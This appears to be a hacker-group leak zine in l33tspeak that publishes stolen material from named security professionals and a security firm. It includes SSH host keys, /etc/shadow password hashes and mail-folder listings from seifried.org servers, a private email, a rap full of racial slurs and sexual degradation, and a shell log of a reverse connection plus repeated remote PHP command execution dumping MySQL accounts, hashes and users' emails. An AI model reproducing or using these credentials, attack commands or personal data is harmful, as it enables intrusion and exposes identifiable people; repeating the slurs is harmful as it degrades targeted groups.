fw01,216.234.189.4 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApwNPezW74K2l5WuLVamy8N+2DR+9xS8r2qTCu7px8GVzzQNhGktQ/aQmogKuaTf/LcteihrWK2XR7P52CcLc5M6HoxNmKRVkdmKVqi92B83Lzx/xBKrZ4v8TFeKYtxSoTLyvlE+Z3ZR7w/5f3ybNk33Ok2d5nbPX65H8YjCFcpVphkzeSdoXlU+K0ezIB/U8uIPv4oXcxybdOQEDSZuT/8AUfJVVjwBIxFxq1JECy42PBgs85KalxmCDSpTUzcUHwBRaaO4RsRA//zvJydeEOtoUlnx922bmlKlALtN7oioC2PjQrVOxBHx+8z/uJnb0D6KCN2IgdpRkenLDyJ9YGQ==
srv01,216.234.189.7 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAt8JHM7YHSlM4OIV87+tu2/eDY8ImO/k5uPsJomIqlC7/hN45SXsZ07gLQ8OEBmNPyN+bNWP2TRvjykcBsSeVIAy8jdZE1yt5lT4gGAOGyfawZwBh1EFqCnHoECqc2u3Cha1bLV+jDNAwzTj5oQrv9DMcBo8T3kuDuovL/DJJLjk=
fw01.seifried.org ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApwNPezW74K2l5WuLVamy8N+2DR+9xS8r2qTCu7px8GVzzQNhGktQ/aQmogKuaTf/LcteihrWK2XR7P52CcLc5M6HoxNmKRVkdmKVqi92B83Lzx/xBKrZ4v8TFeKYtxSoTLyvlE+Z3ZR7w/5f3ybNk33Ok2d5nbPX65H8YjCFcpVphkzeSdoXlU+K0ezIB/U8uIPv4oXcxybdOQEDSZuT/8AUfJVVjwBIxFxq1JECy42PBgs85KalxmCDSpTUzcUHwBRaaO4RsRA//zvJydeEOtoUlnx922bmlKlALtN7oioC2PjQrVOxBHx+8z/uJnb0D6KCN2IgdpRkenLDyJ9YGQ==
srv05,216.234.189.11 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEApEmVQUZUs6ajW/6Kyddfj3zMa60gzYmbBTuDELy1I9bfYHO6D4835HlJnT3cNovuACoMrzs9y0tJGANvox5rJ20Slm6KE2PH0twS0lZcd4cOMtKhOUcGuch/aXTNnGDhrsFQNf3PHxKRuM0AT2qjvLLlghIhYntLSrergb7CZT0=
srv00,216.234.189.6 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAuL/2zr2HSNfyBDuuHFoCbvS8Q/rZeCXFTMWZOPdvMEFZ6wve9phCPb1dwEj7kOlqTpZ+iq9uH/LCPfdVjaBIOAcN4BrZRuv3ABIZZ3MndkD+Q5kfoTZ7LUYgivladV+AYwscyxjU3LvPh4AFM/HrrQBJvVTN39ty/qNOmPh89sc=
undeadly.org,66.51.111.60 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAtRx9+LNuWKXBPRsyMWk3Snzzrcft91cWtQc3d8i+qccY42Rz2QAFPuxLeBiOYwE0EI0TL/t3gmhML5ywktFN8jhWNk+m/hLSYTVOZ4ckXg37uJLdJRIx3KlybJhlGuXADYCDcjIfj4cNOnqW9KHwJmFIc/X7PoBXojYZAXlXk90ELl4csAwcDCZRInh49vEaRHE4jj/yvgpXrZBErTFZgmY21Btnbmj1olRRs2HfDd60t/BzGXQs9P6gI2EP01ONF9OWZAX+CNRC/ru+yVR/mVx0i4Ah5Osd5GZIhxMQLLjYW/HOd/+weIPc09xv4io+01VyH2zmOOf/rOAYJcBTSQ==
sputnik.firstfoundation.ca,142.179.165.115 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAv8//etsP6DIW3wKQl0ggaGrLb9Y2JR9CzW6ADFyDZwWwIpBZ7dE+0dYN4LeyrXWhVUnX1QDY5z8CpI6zoLpmrmKFMyoxE+fkfqFAbQeqcjJwnf77XHYaqEYYcOyssZFD67M/hu9LmcJXZ725hWmCLZH3SNblS1wVqIBXuv7ZNkk=
# grep -v '*' /etc/shadow | grep -v '!'
root:$1$JOEv50Xr$Hhe.Uun5STrEpxilm0dz//:13192:0:99999:7:::
seifadm:$1$JauNGolY$GRPOj.WdEH63ehURLtdcP1:13192:0:99999:7:::
# ssh srv01.seifried.org
root@srv01.seifried.org's Password:
# grep -v '*' /etc/shadow | grep -v '!'
root:$1$k4NSHkWi$wWfG2vILiWiV1mgkUxt1T/:13174:0:99999:7:::
# ssh srv03.seifried.org
root@srv00.seifried.org's Password:
# grep -v '*' /etc/shadow | grep -v '!'
root:$1$4u15hKhb$ZIpCxjsMgILB3PtuwzoqJ0:13195:0:99999:7:::
seifadm:$1$QttOF4NI$FxPCgKBlW6GGHWTVg9TAC/:13195:0:99999:7:::
kurt:$1$T.6KJ61W$0.gmpZrsOw6uKRSScifM//:13199:0:99999:7:::
bt:$1$6cvGun1f$jkMo9kqDjmQuv./66h0B41:13199:0:99999:7:::
listuser:$1$6cvGun1f$jkMo9kqDjmQuv./66h0B41:13199:0:99999:7:::
freescan2:$1$AjenHD.3$A8GlIW6VKOS4FQ7soTkn..:13199:0:99999:7:::
helen:$1$Gj6BQ.Qt$yneo5WlvCoRIbRvHEeQPH0:13199:0:99999:7:::
neil:$1$JWGjqsKY$81MQ/ViZ0wL98N2VFxjFy.:13199:0:99999:7:::
anke:$1$uAk6tGUC$EGHcjiQZ/QXdd0B5RkG3m.:13199:0:99999:7:::
ensimwpl:$1$4Aac3MrU$QniFg8EUaxoSr9M7flnyn.:13217:0:99999:7:::
#ls /home/kurt/mail
1009067.html
37
Drafts
Junk E-mail
Sent
Sent Items
Trash
all
business
cissp
conference
cve
dance
dating
edmforsale
ensim
foo
foo~
freescan
google-ads
inbox
jimreavis
lavalife
lavalife-Shannon
list-mod-archives
list-moderation
old
old-email
old-sent-items
paper
personalbest
ports
portslist
receipts
saved-messages
security-book
securityscanner
spam
test
test90
tuesday-meeting
verisign
viruses
# cat /home/kurt/mail/Sent\ Items

-~-~-~
3d1t3d du3 t0 l4m3n3zz
-~-~-~

#

w3 3nj0y3d th3 punctu4t10n & th3 w3ll us3 0f 4dj3ct1v3z 1n th3 vip@idefense.com
3m41lz, 4lth0ugh th3y w3r3 3xtr3m3ly b0r1ng. y0u'd th1nk w1th 4ll th3 drug
4dd1ctz @ idefense th3y w0uld b3 a b1t m0r3 l1v3ly. 4ls0.. sh0uldnt y0u guyz b3
uz1ng pgp 0r s0m3th1ng? h0no w1ll 0ff3r a 0n3 t1m3 s3cur1ty 4ud1t 0f th3
v3r1s1gn vpnz 1f y0u pr0m0t3 th3 d4t4th31f t0 l34d th3 p3nt3zt1ng (w3 h34r h3'z
g0t th3 0d4yz).

0n3 m0r3 th1ng.. th1z 3m41l m4d3 uz sp1t 0ur m1lk 0ut.

From kurt@srv00.seifried.org Thu Oct 27 01:52:06 2005
Reply-To: "Kurt Seifried" <kurt@seifried.org>
From: "Kurt Seifried" <kurt@seifried.org>
To: "Jim Reavis" <jim@reavis.org>
References: <E14947B05218D111AC9000AA002F4CE3BC241B@P5100>
Subject: Re: invoice for Sept
Date: Thu, 27 Oct 2005 01:52:06 -0600
MIME-Version: 1.0
Content-Type: text/plain;
format=flowed;
charset="iso-8859-1";
reply-type=original
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2670
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2670
Status: RO
Content-Length: 4333
X-UID: 5842
X-Keywords:

> Just getting around to paying this today, sorry for the delay, have been
> traveling too much.

No problem,

> I haven't given you anything to do for your Oct invoice, maybe you could
> do
> a little thinking for me on:

One random thought: Cisco's new Layer two control plans, have an agent on
the system/etc, what about IP devices that can't run the agent and need
network access, and have sufficiently complex software to be a problem, like
VOIP phones (most of which seem to have a web setup), it occurs to me an
attacker can simply arp spoof/etc an IP device that doesn't have to run the
agent.

> Secure Software Development - anything out there interest you in terms of
> tools or methodologies? (Fortify, Ounce Labs, etc) I am attaching a preso
> MS does, interested in your reaction to what they are doing, is it good?

They're getting slightly better but one huge hole is QA. I found yet another
gaping flaw in PGP that is trivial to test (took me 10 seconds to find it
once I decided to look for it) and should have been addressed with the last
bug report I did on PGP with respect to alternate data streams. PGP is
obviously not doing any real QA, and if they are they're ignoring the
results (scary either way).

> Any perspective about where companies are overspending/underspending on
> security?

Corporations I think are probably spending more on technology when they
could get a better return by investing in people and process. Good change
control/up to date patching and (boring bit here) enforcing least privilege
would go a long way. I recently spent 3 hours totally tightening up the
firewalls for seifried.org (I now allow SYN in for a few tcp ports, and for
UDP on port 53 and established connections out with a default deny policy),
restricting ssh (listen on the main IP only, only allow "seifried" in),
restricting various services (i.e. WWW servers now listen only on the
specific IP's that are needed, not every IP attached to the system). But now
the only way you can get interactive shell access to seifried.org is with my
password (which I plan to block soon and only allow public key auth). The
service listening lock down is especially useful since any changes now
require tweaking the firewall and the server to expose a new service to the
world, I'm unlikely to accidently expose something if I have to make two
sets of different changes on different systems, my goal is to make it hard
for me to make mistakes.

> Anything interesting you are seeing from the threat side or any other
> angle,
> interesting investment oppty, etc?

A lot more use of intelligence. I'm seeing SSH login attempts for adm, root,
ftp and so on, and for the account my mother uses (anke@seifried.org, a very
uncommon name to say the least), obviously harvested from somewhere (she
doesn't have a web page though.....). This is a hell of a lot more likely to
be effective then randomly blasting away at user accounts, and names can be
harvested via google/etc, so the target won't know. I suspect longer term
we'll see very intelligent account enumeration (troll google, etc.), which
is worrying for larger sites that may not have good password
policies/enforcement. Botnet activity of course is huge and only going to
get worse (it's where the money is).

Another interesting thing that happened to me was my website being spammed.
I run a wiki (seifried.org/security/), was allowing anonymous edits (not
anymore), someone edited one of the help pages (out of the way) to have
links to various pharma spam sites, then a while later according to the logs
google rolled through, then the (scary part here) spammer went through and
cleaned up the changes. No way I would have noticed this if I didn't
actually read the change logs. So using my google page rank of 5 or so (and
who knows how many other sites) they have improved their google ranking
considerably. Sadly I can't win that war (registering an account is trivial
and adding that capability to the spam bot wouldn't be to hard). This will
mean CAPTCHA (sp?) tests for all wiki edits and who knows what else.

Attackers that clean up worry me because it indicates that they're smart and
probably want to come back (don't make it so painful that the target fixes
the problem).

> Thanks!
>
> Jim Reavis

-Kurt


11.txt -~-~-~ 0d4y iCER r4pz

and "True Elitez"
rap by iCER (#!blackhat @ efnet)

yo nigga
iCER in the house
sittin in my crib
wearin' my mom's blouse
sometimes i smoke crack
i wish i was black
don't worry nigga
i'll overflow yo stack
cuz i'm elite
az elite as they come
all i do is hack
which is why i'm a bum
sittin with my laptop
drinkin some rum
now i know what u think
hackin'z hard
but not for me nigga
i pull that 0day trigga
sittin on eye-are-sea all day
with my main man bx
ill teach lamerz a lesson
fuck them fuckz up
with some mad password guessin
login into sshd'z
i tried to fuck my sister
but she's a goddamn tease
oh well homie,
at least hackin'z a breeze
some people steppin
so i get to strcpy greppin
sometimes it dont work
so i go to bugtraq
my hackin skillz dont lack
'cause i fuckin read phrack
ratta tat tat there goes 0day gat
my hackin skillz are like artillery
im a maniac on your network
fuckin around with your filesystemz
u dont know where the bd'z lurk

[chorus]
i'll ice you
i'll ice ur friendz
nigga ill ice ur box
i'm as slick as a fox
my hackin skillz rox
[/chorus] x 4

fuck with my crew
and you'll be black and blue
im hard as a rock
my condom is a dirty sock
ddos me, hell no
ill put ur box on lock
im all about sellin cool drugz
cuz im hardcore
bx is my blackhat homie
we true blackhatz
but we dont do illegal shit
just chillin in eye-are-see
thatz my crib fo sho
i keep my shit on the low
i'm iCER nigga
i'll fuck you in the butt
it feels real good
just call me a gay slut
and i wont give ur butt a cut
last time i fucked
i gave bx 6 stitches on his ass
he liked it a lot
and then we smoked some pot
you think your game for the big iCER?
i'll own your ass
unless you be a little nicer!@!
some say im like big gay al
lisp and all
my ass will give you a growl
now im a social engineer
i got mad tekneeqz
last time i took a shower
was two fuckin weeks
and now my ass fuckin reaks
#!blackhat is the place
to show ur hackin grace
ill suck on bx tits
and take two big shits
we're true blackhats
nobody can beat us
not even pee-aych-sea
cuz japboy cant crack our key
so tell me what you wanna be
ill hack you and let a virus free
if anyone is leet itz me

[chorus] x 5


12.txt -~-~-~ core-sdi b1t3z th31r t0ngu3.

pl34s3 n0t3, w3 d0 n0t t4k3 subm1ss10nz. w3 f0und th1s f1l3 0n a l4rg3 sh3ll
pr0v1d3r.

(root@host)# ./listen -p9090
[w41t1ng..]
[g0t c0nn3ct10n!]
$ uname -a
OpenBSD kenny.corelabs.core-sdi.com 3.3 GENERIC#1 i386
$ cat config.php | grep -v '//'
<?php

$pnconfig['dbtype'] = 'mysql';
$pnconfig['dbtabletype'] = 'myisam';
$pnconfig['dbhost'] = '127.0.0.1';
$pnconfig['dbuname'] = 'cm9vdA==';
$pnconfig['dbpass'] = 'NzNsaCx4';
$pnconfig['dbname'] = 'Comunnity';
$pnconfig['system'] = '0';
$pnconfig['prefix'] = 'impact';
$pnconfig['encoded'] = '1';

GLOBAL $pndebug;
$pndebug['debug'] = 0;
$pndebug['debug_sql'] = 0;


if (@file_exists("personal_config.php"))
{ include("personal_config.php"); }
extract($pnconfig, EXTR_OVERWRITE);
?>
$ ls -a

.
..
javascript
pnadodb
kb
images
docs
language
themes
includes
modules
welcome

mainfile.php
modules.php
pntables.php
print.php
referer.php
robots.txt
user.php

admin.php
xmlrpc.php
backend.php
banners.php
config-old.php
config.php
error.php
footer.php
header.php
index.php
pntables.php.orig
pntables.php.buchu

modules.php.orig
exploits
welcome_old
imps

$ ls -a ../
.
..
impact
index.html
oss
impact_devel
impact_new
default

$ ls -a ../../
.
..
run
var
index.html
cgi-bin
conf
htdocs
icons
logs
users

$ ls -a ../../conf/
.
..
httpd.conf
httpd.conf-dist
magic
mime.types
php.ini
httpd.conf.bak

php.ini.bak

$ ls -a ../../logs/
.
..
error_log
ssl_engine_log
access_log
etag-state
httpd.pid
ssl_scache.db

oss-error_log
oss-access_log
default-error_log
default-access_log

access_log_comb
oss-access_log_comb

$ ls -a ../../cgi-bin/

.
..
printenv
test-cgi

[c0nn3ct10n dr0pd]
(root@host)#
(root@host)# perl x2.pl http://support.coresecurity.com/impact/ "\$con=mysql_connect('127.0.0.1','root','
73lh,x');mysql_select_db('mysql', \$con);\$res=mysql_query('select * from user', \$con) or die('whh');mysql_close(\$con);if(\
$res){echo('succ');while(\$row=mysql_fetch_assoc(\$res)){var_dump(\$row);echo('------');}}else{echo('failed');}"

[*] Sending command $con=mysql_connect('127.0.0.1','root','73lh,x');mysql_select_db('mysql', $con);$res=mysql_query('select * from user', $con) or die('whh');mysql_close($con);if($res){echo('succ');while($row=mysql_fetch_assoc($res)){var_dump($row);echo('------');}}else{echo('failed');}
[*] Command sent, waiting for response
succarray(17) {
["Host"]=>
string(1) "%"
["User"]=>
string(4) "root"
["Password"]=>
string(16) "198b1a3c66d30d36"
["Select_priv"]=>
string(1) "Y"
["Insert_priv"]=>
string(1) "Y"
["Update_priv"]=>
string(1) "Y"
["Delete_priv"]=>
string(1) "Y"
["Create_priv"]=>
string(1) "Y"
["Drop_priv"]=>
string(1) "Y"
["Reload_priv"]=>
string(1) "Y"
["Shutdown_priv"]=>
string(1) "Y"
["Process_priv"]=>
string(1) "Y"
["File_priv"]=>
string(1) "Y"
["Grant_priv"]=>
string(1) "Y"
["References_priv"]=>
string(1) "Y"
["Index_priv"]=>
string(1) "Y"
["Alter_priv"]=>
string(1) "Y"
}
------array(17) {
["Host"]=>
string(9) "localhost"
["User"]=>
string(0) ""
["Password"]=>
string(0) ""
["Select_priv"]=>
string(1) "N"
["Insert_priv"]=>
string(1) "N"
["Update_priv"]=>
string(1) "N"
["Delete_priv"]=>
string(1) "N"
["Create_priv"]=>
string(1) "N"
["Drop_priv"]=>
string(1) "N"
["Reload_priv"]=>
string(1) "N"
["Shutdown_priv"]=>
string(1) "N"
["Process_priv"]=>
string(1) "N"
["File_priv"]=>
string(1) "N"
["Grant_priv"]=>
string(1) "N"
["References_priv"]=>
string(1) "N"
["Index_priv"]=>
string(1) "N"
["Alter_priv"]=>
string(1) "N"
}
------array(17) {
["Host"]=>
string(5) "kenny"
["User"]=>
string(0) ""
["Password"]=>
string(0) ""
["Select_priv"]=>
string(1) "N"
["Insert_priv"]=>
string(1) "N"
["Update_priv"]=>
string(1) "N"
["Delete_priv"]=>
string(1) "N"
["Create_priv"]=>
string(1) "N"
["Drop_priv"]=>
string(1) "N"
["Reload_priv"]=>
string(1) "N"
["Shutdown_priv"]=>
string(1) "N"
["Process_priv"]=>
string(1) "N"
["File_priv"]=>
string(1) "N"
["Grant_priv"]=>
string(1) "N"
["References_priv"]=>
string(1) "N"
["Index_priv"]=>
string(1) "N"
["Alter_priv"]=>
string(1) "N"
}
------array(17) {
["Host"]=>
string(1) "%"
["User"]=>
string(4) "paco"
["Password"]=>
string(16) "184b39817e29f164"
["Select_priv"]=>
string(1) "Y"
["Insert_priv"]=>
string(1) "Y"
["Update_priv"]=>
string(1) "Y"
["Delete_priv"]=>
string(1) "N"
["Create_priv"]=>
string(1) "N"
["Drop_priv"]=>
string(1) "N"
["Reload_priv"]=>
string(1) "N"
["Shutdown_priv"]=>
string(1) "N"
["Process_priv"]=>
string(1) "N"
["File_priv"]=>
string(1) "N"
["Grant_priv"]=>
string(1) "N"
["References_priv"]=>
string(1) "N"
["Index_priv"]=>
string(1) "N"
["Alter_priv"]=>
string(1) "N"
}
------(root@host)# perl x2.pl http://support.coresecurity.com/impact/ "\$con=mysql_connect('127.0.0.1','root','73lh,x');mysql_select_db('Comunnity', \$con);\$res=mysql_query('show tables', \$con) or die('whh');mysql_close(\$con);if(\$re
s){echo('succ');while(\$row=mysql_fetch_assoc(\$res)){var_dump(\$row);echo('------');}}else{echo('failed');}"

[*] Sending command $con=mysql_connect('127.0.0.1','root','73lh,x');mysql_select_db('Comunnity', $con);$res=mysql_query('show tables', $con) or die('whh');mysql_close($con);if($res){echo('succ');while($row=mysql_fetch_assoc($res)){var_dump($row);echo('------');}}else{echo('failed');}
[*] Command sent, waiting for response
succarray(1) {
["Tables_in_Comunnity"]=>
string(16) "impact_autolinks"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(15) "impact_autonews"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(13) "impact_banner"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(19) "impact_bannerclient"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(19) "impact_bannerfinish"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(13) "impact_blocks"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(21) "impact_blocks_buttons"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(15) "impact_comments"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(14) "impact_counter"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(27) "impact_downloads_categories"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(26) "impact_downloads_downloads"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(27) "impact_downloads_editorials"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(27) "impact_downloads_modrequest"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(28) "impact_downloads_newdownload"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(30) "impact_downloads_subcategories"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(25) "impact_downloads_votedata"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(12) "impact_ephem"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(16) "impact_faqanswer"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(20) "impact_faqcategories"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(23) "impact_group_membership"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(18) "impact_group_perms"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(13) "impact_groups"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(16) "impact_headlines"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(12) "impact_hooks"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(25) "impact_languages_constant"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(21) "impact_languages_file"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(28) "impact_languages_translation"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(23) "impact_links_categories"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(23) "impact_links_editorials"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(18) "impact_links_links"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(23) "impact_links_modrequest"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(20) "impact_links_newlink"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(21) "impact_links_votedata"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(14) "impact_message"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(18) "impact_module_vars"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(14) "impact_modules"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(17) "impact_poll_check"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(16) "impact_poll_data"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(16) "impact_poll_desc"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(19) "impact_pollcomments"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(16) "impact_priv_msgs"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(12) "impact_queue"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(13) "impact_quotes"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(14) "impact_ratings"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(17) "impact_ratingslog"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(13) "impact_realms"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(14) "impact_referer"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(14) "impact_related"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(14) "impact_reviews"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(18) "impact_reviews_add"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(23) "impact_reviews_comments"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(19) "impact_reviews_main"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(14) "impact_seccont"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(17) "impact_seccontnew"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(15) "impact_sections"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(18) "impact_sectionsnew"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(19) "impact_session_info"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(17) "impact_stats_date"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(17) "impact_stats_hour"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(18) "impact_stats_month"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(17) "impact_stats_week"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(14) "impact_stories"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(18) "impact_stories_cat"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(13) "impact_topics"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(16) "impact_user_data"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(17) "impact_user_perms"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(20) "impact_user_property"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(17) "impact_userblocks"
}
------array(1) {
["Tables_in_Comunnity"]=>
string(12) "impact_users"
}
------(root@host)# perl x2.pl http://support.coresecurity.com/impact/ "\$con=mysql_connect('127.0.0.1','root','
73lh,x');mysql_select_db('Comunnity', \$con);\$res=mysql_query('select * from impact_users', \$con) or die('whh');mysql_close
(\$con);if(\$res){echo('succ');while(\$row=mysql_fetch_assoc(\$res)){var_dump(\$row);echo('------');}}else{echo('failed');}"

[*] Sending command $con=mysql_connect('127.0.0.1','root','73lh,x');mysql_select_db('Comunnity', $con);$res=mysql_query('select * from impact_users', $con) or die('whh');mysql_close($con);if($res){echo('succ');while($row=mysql_fetch_assoc($res)){var_dump($row);echo('------');}}else{echo('failed');}
[*] Command sent, waiting for response
succarray(31) {
["pn_uid"]=>
string(1) "1"
["pn_name"]=>
string(0) ""
["pn_uname"]=>
string(9) "Anonymous"
["pn_email"]=>
string(0) ""
["pn_femail"]=>
string(0) ""
["pn_url"]=>
string(0) ""
["pn_user_avatar"]=>
string(9) "blank.gif"
["pn_user_regdate"]=>
string(10) "1058302436"
["pn_user_icq"]=>
string(0) ""
["pn_user_occ"]=>
string(0) ""
["pn_user_from"]=>
string(0) ""
["pn_user_intrest"]=>
string(0) ""
["pn_user_sig"]=>
string(0) ""
["pn_user_viewemail"]=>
string(1) "0"
["pn_user_theme"]=>
string(1) "0"
["pn_user_aim"]=>
string(0) ""
["pn_user_yim"]=>
string(0) ""
["pn_user_msnm"]=>
string(0) ""
["pn_pass"]=>
string(0) ""
["pn_storynum"]=>
string(2) "10"
["pn_umode"]=>
string(0) ""
["pn_uorder"]=>
string(1) "0"
["pn_thold"]=>
string(1) "0"
["pn_noscore"]=>
string(1) "0"
["pn_bio"]=>
string(0) ""
["pn_ublockon"]=>
string(1) "0"
["pn_ublock"]=>
string(0) ""
["pn_theme"]=>
string(0) ""
["pn_commentmax"]=>
string(4) "4096"
["pn_counter"]=>
string(1) "0"
["pn_timezone_offset"]=>
string(4) "12.0"
}
------array(31) {
["pn_uid"]=>
string(1) "2"
["pn_name"]=>
string(14) "Bruno Acselrad"
["pn_uname"]=>
string(5) "buchu"
["pn_email"]=>
string(22) "buchu@coresecurity.com"
["pn_femail"]=>
string(0) ""
["pn_url"]=>
string(27) "http://www.coresecurity.com"

["pn_user_avatar"]=>
string(9) "blank.gif"
["pn_user_regdate"]=>
string(10) "1058302436"
["pn_user_icq"]=>
string(0) ""
["pn_user_occ"]=>
string(0) ""
["pn_user_from"]=>
string(0) ""
["pn_user_intrest"]=>
string(0) ""
["pn_user_sig"]=>
string(0) ""
["pn_user_viewemail"]=>
string(1) "0"
["pn_user_theme"]=>
string(1) "0"
["pn_user_aim"]=>
string(0) ""
["pn_user_yim"]=>
string(0) ""
["pn_user_msnm"]=>
string(0) ""
["pn_pass"]=>
string(32) "922ed3056a156d0c2a868ae91c735410"
["pn_storynum"]=>
string(2) "10"
["pn_umode"]=>
string(0) ""
["pn_uorder"]=>
string(1) "0"
["pn_thold"]=>
string(1) "0"
["pn_noscore"]=>
string(1) "0"
["pn_bio"]=>
string(0) ""
["pn_ublockon"]=>
string(1) "0"
["pn_ublock"]=>
string(0) ""
["pn_theme"]=>
string(7) "Core-v1"
["pn_commentmax"]=>
string(4) "4096"
["pn_counter"]=>
string(1) "1"
["pn_timezone_offset"]=>
string(4) "12.0"
}
------array(31) {
["pn_uid"]=>
string(1) "3"
["pn_name"]=>
string(0) ""
["pn_uname"]=>
string(4) "Test"
["pn_email"]=>
string(16) "buchu@corest.com"
["pn_femail"]=>
string(0) ""
["pn_url"]=>
string(0) ""
["pn_user_avatar"]=>
string(9) "blank.gif"
["pn_user_regdate"]=>
string(10) "1059683345"
["pn_user_icq"]=>
string(0) ""
["pn_user_occ"]=>
string(0) ""
["pn_user_from"]=>
string(0) ""
["pn_user_intrest"]=>
string(0) ""
["pn_user_sig"]=>
string(0) ""
["pn_user_viewemail"]=>
string(1) "0"
["pn_user_theme"]=>
NULL
["pn_user_aim"]=>
string(0) ""
["pn_user_yim"]=>
string(0) ""
["pn_user_msnm"]=>
string(0) ""
["pn_pass"]=>
string(32) "c6c7b5e75856d69c00449ad9153f541c"
["pn_storynum"]=>
string(2) "10"
["pn_umode"]=>
string(0) ""
["pn_uorder"]=>
string(1) "0"
["pn_thold"]=>
string(1) "0"
["pn_noscore"]=>
string(1) "0"
["pn_bio"]=>
string(0) ""
["pn_ublockon"]=>
string(1) "0"
["pn_ublock"]=>
string(0) ""
["pn_theme"]=>
string(0) ""
["pn_commentmax"]=>
string(4) "4096"
["pn_counter"]=>
string(1) "0"
["pn_timezone_offset"]=>
string(4) "12.0"
}
------array(31) {
["pn_uid"]=>
string(1) "4"
["pn_name"]=>
string(10) "Alex Horan"
["pn_uname"]=>
string(4) "alex"
["pn_email"]=>
string(27) "alex.horan@coresecurity.com"
["pn_femail"]=>
string(0) ""
["pn_url"]=>
string(7) "http://"

["pn_user_avatar"]=>
string(9) "blank.gif"
["pn_user_regdate"]=>
string(10) "1078774842"
["pn_user_icq"]=>
string(0) ""
["pn_user_occ"]=>
string(0) ""
["pn_user_from"]=>
string(0) ""
["pn_user_intrest"]=>
string(0) ""
["pn_user_sig"]=>
string(0) ""
["pn_user_viewemail"]=>
string(1) "0"
["pn_user_theme"]=>
NULL
["pn_user_aim"]=>
string(0) ""
["pn_user_yim"]=>
string(0) ""
["pn_user_msnm"]=>
string(0) ""
["pn_pass"]=>
string(32) "ea045a641ee701b44a2f0b04f4fb8b33"
["pn_storynum"]=>
string(2) "10"
["pn_umode"]=>
string(0) ""
["pn_uorder"]=>
string(1) "0"
["pn_thold"]=>
string(1) "0"
["pn_noscore"]=>
string(1) "0"
["pn_bio"]=>
string(0) ""
["pn_ublockon"]=>
string(1) "0"
["pn_ublock"]=>
string(0) ""
["pn_theme"]=>
string(0) ""
["pn_commentmax"]=>
string(4) "4096"
["pn_counter"]=>
string(1) "0"
["pn_timezone_offset"]=>
string(3) "7.0"
}
------(root@host)# perl x2.pl http://support.coresecurity.com/impact/ "\$con=mysql_connect('127.0.0.1','root','
73lh,x');mysql_select_db('Community', \$con);\$res=mysql_query('select * from impact_users', \$con) or die('whh');mysql_close
(\$con);if(\$res){echo('succ');while(\$row=mysql_fetch_assoc(\$res)){var_dump(\$row);echo('------');}}else{echo('failed');}"

